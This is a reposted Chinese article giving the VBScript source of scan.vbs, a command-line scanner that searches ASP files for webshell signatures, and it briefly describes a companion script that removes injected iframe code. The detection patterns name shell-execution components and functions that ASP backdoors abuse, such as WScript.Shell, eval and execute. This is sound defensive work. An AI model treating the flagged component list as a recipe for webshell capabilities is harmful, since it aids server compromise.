欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

雷客图 站长安全助手 vbs版代码(asp 木马查找)

程序员文章站 2022-04-10 08:01:45
均在命令行下使用 antiiframe.vbs #该脚本是批量挂马程序的逆向,用于批量清除被添加到文件中的恶意代码。记事本打开文件可以修改pattern参数指定要处理的文件...
均在命令行下使用
antiiframe.vbs

#该脚本是批量挂马程序的逆向,用于批量清除被添加到文件中的恶意代码。记事本打开文件可以修改pattern参数指定要处理的文件名,文件名之间用|隔开(也支持vbs正则表达式)。由于要修改文件,请谨慎的使用(最好先备份文件)
#用法: cscript antiiframe.vbs [处理的路径] [包含清除内容的文件]
#例子: cscript antiiframe.vbs d:\web d:\lake2.txt
----------------------------
scan.vbs

#该脚本用于本地扫描asp木马,速度比asp版快很多。可能存在误报、漏报的情况,视具体情况处理
#用法: cscript scan.vbs [扫描路径] [结果htm文件路径]
#例子: cscript scan.vbs d:\web f:\my\report.html

scan.vbs
复制代码 代码如下:

'-----------------------
'scan asp webshell in vbs
'author: lake2 (http://lake2.0x54.org)
'date: 2007-7-29
'version: 1.1
'-----------------------

dimfileext = "asp,cer,asa,cdx"
dim report, report2, sun, sumfiles, sumfolders

call showinfo()
if wscript.arguments.count = 2 then
    sun = 0
    sumfiles = 0
    sumfolders = 1
    if right(wscript.arguments.item(0),1) = "\" then
        thepath = mid(wscript.arguments.item(0),1,len(wscript.arguments.item(0))-1)
    else
        thepath = wscript.arguments.item(0)
    end if
    call checkarg(thepath)
    wscript.echo "开始扫描,请稍候……"
    wscript.sleep(1000)
    starttime = now()
    call showallfile(thepath)
    endtime = now()
    wscript.echo vbcrlf & "扫描完成!" & vbcrlf
    report2 = report2 & "<html><head><title>雷客图 asp 站长安全助手vbs版扫描报告</title>"
    report2 = report2 & "<meta http-equiv=""content-type"" content=""text/html; charset=gb2312""></head>"
    report2 = report2 & "<body><b><font size=4>雷客图 asp 站长安全助手vbs版扫描报告</font></b><br><br>"
    report2 = report2 & "<font size=2>开始时间:"&starttime&"</font><br>"
    report2 = report2 & "<font size=2>结束时间:"&endtime&"</font><br>"
    report2 = report2 & "<font size=2>扫描完毕!一共检查文件夹<font color=""#ff0000"">"&sumfolders&"</font>个,文件<font color=""#ff0000"">"&sumfiles&"</font>个,发现可疑点<font color=""#ff0000"">"&sun&"</font>个(<font color=""#ff0000"">红字</font>显示的为严重可疑)</font><br/>"
    report2 = report2 & "<table width=""100%"" border=""1"" bordercolor=""blue"" style=""padding:5px;line-height:170%;clear:both;font-size:12px;word-break:break-all"">"
    report2 = report2 & "<tr>"
    report2 = report2 & "<td width=""20%"">文件路径</td>"
    report2 = report2 & "<td width=""20%"">特征码</td>"
    report2 = report2 & "<td width=""40%"">描述</td>"
    report2 = report2 & "<td width=""20%"">创建/修改时间</td>"
    report2 = report2 & "</tr>"
    report2 = report2 & "<p>"
    report2 = report2 & report
    report2 = report2 & "</p>"
    report2 = report2 & "</table><hr><script src=http://www.0x54.org/announce.js></script>"
    report2 = report2 & "<div align=center>powered by <a href=""http://www.0x54.org"" target=_blank>0x54.org</a></div>"
    report2 = report2 & "</body></html>"
    call writetofile()
else
    call showhelp()
end if

sub showinfo()
    helpstr = helpstr & "==============================" & vbcrlf
    helpstr = helpstr & "===== 欢迎使用雷客图 asp 站长安全助手vbs版 =====" & vbcrlf
    helpstr = helpstr & "===== 之 检查asp木马 =====" & vbcrlf
    helpstr = helpstr & "===== author: lake2 =====" & vbcrlf
    helpstr = helpstr & "===== email:lake2@mail.csdn.net =====" & vbcrlf
    helpstr = helpstr & "===== 欢迎访问 www.0x54.org 得到更多信息 =====" & vbcrlf
    helpstr = helpstr & "==============================" & vbcrlf
    helpstr = helpstr & vbcrlf
    wscript.echo helpstr
end sub

sub showhelp()
    helpstr = helpstr & "#用法: cscript scan.vbs [扫描路径] [结果htm文件路径]" & vbcrlf
    helpstr = helpstr & "#例子: cscript scan.vbs d:\web f:\my\report.html" & vbcrlf
    helpstr = helpstr & vbcrlf
    wscript.echo helpstr
end sub

sub checkarg(arg)
    tmppath = arg
    tmppath2 = left(wscript.arguments.item(1), instrrev(wscript.arguments.item(1),"\")-1)
    set objfso = wscript.createobject ("scripting.filesystemobject")
    if not objfso.folderexists(tmppath2) then
        wscript.echo "error:错误的路径“" & tmppath2 & "”!"
        wscript.quit
    elseif not objfso.folderexists(tmppath) then
        wscript.echo "error:错误的路径“" & tmppath & "”!"
        wscript.quit    
    end if
    set objfso = nothing
end sub

'遍历处理path及其子目录所有文件
sub showallfile(path)
    wscript.echo "正在检查目录" & path
    set fso = createobject("scripting.filesystemobject")
    set f = fso.getfolder(path)
    set fc2 = f.files
    for each myfile in fc2
        if checkext(fso.getextensionname(path&"\"&myfile.name)) then
            'wscript.echo "正在检查文件" & path&"\"&myfile.name
            call scanfile(path&temp&"\"&myfile.name, "")
            sumfiles = sumfiles + 1
        end if
    next
    set fc = f.subfolders
    for each f1 in fc
        showallfile path&"\"&f1.name
        sumfolders = sumfolders + 1
    next
    set fso = nothing
end sub

'检查文件后缀,如果与预定的匹配即返回true
function checkext(fileext)
    if dimfileext = "*" then checkext = true
    ext = split(dimfileext,",")
    for i = 0 to ubound(ext)
        if lcase(fileext) = ext(i) then
            checkext = true
            exit function
        end if
    next
end function

'检测文件
sub scanfile(filepath, infile)
    if infile <> "" then
        infiles = "<font color=red>该文件被"& infile & "文件包含执行</font>"
    end if
    temp = filepath
    on error resume next
    set tstream = wscript.createobject("adodb.stream")
    tstream.type = 1
    tstream.mode = 3
    tstream.open
    tstream.position=0
    tstream.loadfromfile filepath
    if err then exit sub end if
    tstream.type = 2
    tstream.charset = "gb2312"
    do until tstream.eos
        filetxt = filetxt & lcase(replace(tstream.readtext(102400), chr(0), ""))
    loop
    tstream.close()
    set tstream = nothing

    set fsos = wscript.createobject("scripting.filesystemobject")    
    if len(filetxt) >0 then
        '特征码检查
        filetxt = vbcrlf & filetxt
            'check "wscr"&domybest&"ipt.shell"
            if instr( filetxt, lcase("wscr"&domybest&"ipt.shell") ) or instr( filetxt, lcase("clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8") ) then
                report = report&"<tr><td>"&temp&"</td><td>wscr"&domybest&"ipt.shell 或者 clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8</td><td><font color=red>危险组件,一般被asp木马利用</font>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check "she"&domybest&"ll.application"
            if instr( filetxt, lcase("she"&domybest&"ll.application") ) or instr( filetxt, lcase("clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000") ) then
                report = report&"<tr><td>"&temp&"</td><td>she"&domybest&"ll.application 或者 clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000</td><td><font color=red>危险组件,一般被asp木马利用</font>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check .encode
            set regex = new regexp
            regex.ignorecase = true
            regex.global = true
            regex.pattern = "\blanguage\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>(vbscript|jscript|javascript).encode</td><td><font color=red>似乎脚本被加密了,一般asp文件是不会加密的</font>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check my asp backdoor :(
            regex.pattern = "\bev"&"al\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>ev"&"al</td><td>e"&"val()函数可以执行任意asp代码,被一些后门利用。其形式一般是:ev"&"al(x)<br>但是javascript代码中也可以使用,有可能是误报。"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check exe&cute backdoor
            regex.pattern = "[^.]\bexe"&"cute(global)?\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>exec"&"ute()或者exe"&"cuteglobal()</td><td><font color=red>该函数可以执行任意asp代码,被一些后门利用。其形式一般是:ex"&"ecute(x)</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check script.control
            regex.pattern = "\.execu"&"testatement\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>.exec"&"utestatement</td><td><font color=red>发现msscriptcontrol.scriptcontrol的.execut"&"estatement函数</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check .(open|create)textfile
            regex.pattern = "\.(open|create)textfile\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>.crea"&"tetextfile|.o"&"pentextfile</td><td>使用了fso的createtextfile|opentextfile函数读写文件"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check .savet&ofile
            regex.pattern = "\.savet"&"ofile\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>.sa"&"vetofile</td><td>使用了stream或者jmail的savetofile函数写文件"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check .&save|.&saveas
            regex.pattern = "\.sa"&"ve(as)?\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>.sa"&"ve或者.sa"&"veas</td><td>使用了save或saveas函数写文件"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check set server
            regex.pattern = "set\s*.*\s*=\s*server\s"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>set xxx=se"&"rver</td><td><font color=red>发现set xxx=ser" & jj & "ver,请管理员仔细检查是否调用.execute</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check server.(transfer|ex&ecute)
            regex.pattern = "server.(ex"&"ecute|transfer)([ \t]*|\()[^""]\)"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>server.ex"&"ecute</td><td><font color=red>不能跟踪检查server.e"&"xecute()函数执行的文件。请管理员自行检查</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check .ru&n
            regex.pattern = "\.r"&"un\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>.ru"&"n</td><td><font color=red>发现 wscript 的 run 函数</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check .exe&c
            regex.pattern = "\.ex"&"ec\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>.ex"&"ec</td><td><font color=red>发现 wscript 的 exec 函数</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check .shel&lexecute
            regex.pattern = "\.shel"&"lexecute\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>.shelle"&"xecute</td><td><font color=red>发现 application 的 shellexecute 函数</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            'check .&create
            regex.pattern = "\.cre"&"ate\b"
            if regex.test(filetxt) then
                report = report&"<tr><td>"&temp&"</td><td>.crea"&"te</td><td>发现 create 函数<br>"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
            end if
            set regex = nothing

        
        'check include file not with "&'
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "<!--\s*#include\s+(file|virtual)\s*=\s*.*-->"
        set matches = regex.execute(filetxt)
        for each match in matches
            tfile = replace(trim(mid(match.value, instr(match.value, "=") + 1, len(match.value) - instr(match.value, "=") - 1)),"/","\")
            if left(tfile, 1)="'" then
                tfile = mid(tfile, 2, instr(2, tfile, "'", 1) - 2)
            elseif left(tfile, 1)="""" then
                tfile = mid(tfile, 2, instr(2, tfile, """", 1) - 2)
            else
                tfile = replace(tfile, chr(9), " ")
                if instr(tfile, " ") <> 0 then
                    tfile = left(tfile, instr( tfile, " ") - 1)
                else
                    tfile = left(tfile, instr( tfile, "-") - 1)
                end if
            end if
            if not checkext(fsos.getextensionname(tfile)) then
                call scanfile( mid(filepath,1,instrrev(filepath,"\"))&tfile, filepath)
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing

        'check server&.execute|transfer
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "server.(exec"&"ute|transfer)([ \t]*|\()"".*?"""
        set matches = regex.execute(filetxt)
        for each match in matches
            tfile = replace(mid(match.value, instr(match.value, """") + 1, len(match.value) - instr(match.value, """") - 1),"/","\")
            if not checkext(fsos.getextensionname(tfile)) then
                call scanfile( mid(filepath,1,instrrev(filepath,"\"))&tfile, filepath)
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing

        'check runatscript
        set xregex = new regexp
        xregex.ignorecase = true
        xregex.global = true
        xregex.pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>"
        set xmatches = xregex.execute(filetxt)
        for each match in xmatches
            tmplake2 = mid(match.value, 1, instr(match.value, ">"))
            srcseek = instr(1, tmplake2, "src", 1)
            if srcseek > 0 then
                srcseek2 = instr(srcseek, tmplake2, "=")
                for i = 1 to 50
                    tmp = mid(tmplake2, srcseek2 + i, 1)
                    if tmp <> " " and tmp <> chr(9) and tmp <> vbcrlf then
                        exit for
                    end if
                next
                if tmp = """" then
                    tmpname = mid(tmplake2, srcseek2 + i + 1, instr(srcseek2 + i + 1, tmplake2, """") - srcseek2 - i - 1)
                else
                    if instr(srcseek2 + i + 1, tmplake2, " ") > 0 then tmpname = mid(tmplake2, srcseek2 + i, instr(srcseek2 + i + 1, tmplake2, " ") - srcseek2 - i) else tmpname = tmplake2
                    if instr(tmpname, chr(9)) > 0 then tmpname = mid(tmpname, 1, instr(1, tmpname, chr(9)) - 1)
                    if instr(tmpname, vbcrlf) > 0 then tmpname = mid(tmpname, 1, instr(1, tmpname, vbcrlf) - 1)
                    if instr(tmpname, ">") > 0 then tmpname = mid(tmpname, 1, instr(1, tmpname, ">") - 1)
                end if
                call scanfile( mid(filepath,1,instrrev(filepath,"\"))&tmpname , filepath)
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing

    end if
        set fsos = nothing

end sub

function getdatemodify(filepath)
    set fso = createobject("scripting.filesystemobject")
    set f = fso.getfile(filepath)
    s = f.datelastmodified
    set f = nothing
    set fso = nothing
    getdatemodify = s
end function

function getdatecreate(filepath)
    set fso = createobject("scripting.filesystemobject")
    set f = fso.getfile(filepath)
    s = f.datecreated
    set f = nothing
    set fso = nothing
    getdatecreate = s
end function

sub writetofile()
    set fso = createobject("scripting.filesystemobject")
    set thefile = fso.opentextfile(wscript.arguments.item(1), 2, true)
    thefile.write(report2)
    thefile.close
    set fso = nothing
    wscript.echo "扫描结果已经写入文件“"&wscript.arguments.item(1)&"”,请查看之!"
end sub


因代码比较多,特打包给大家学习使用。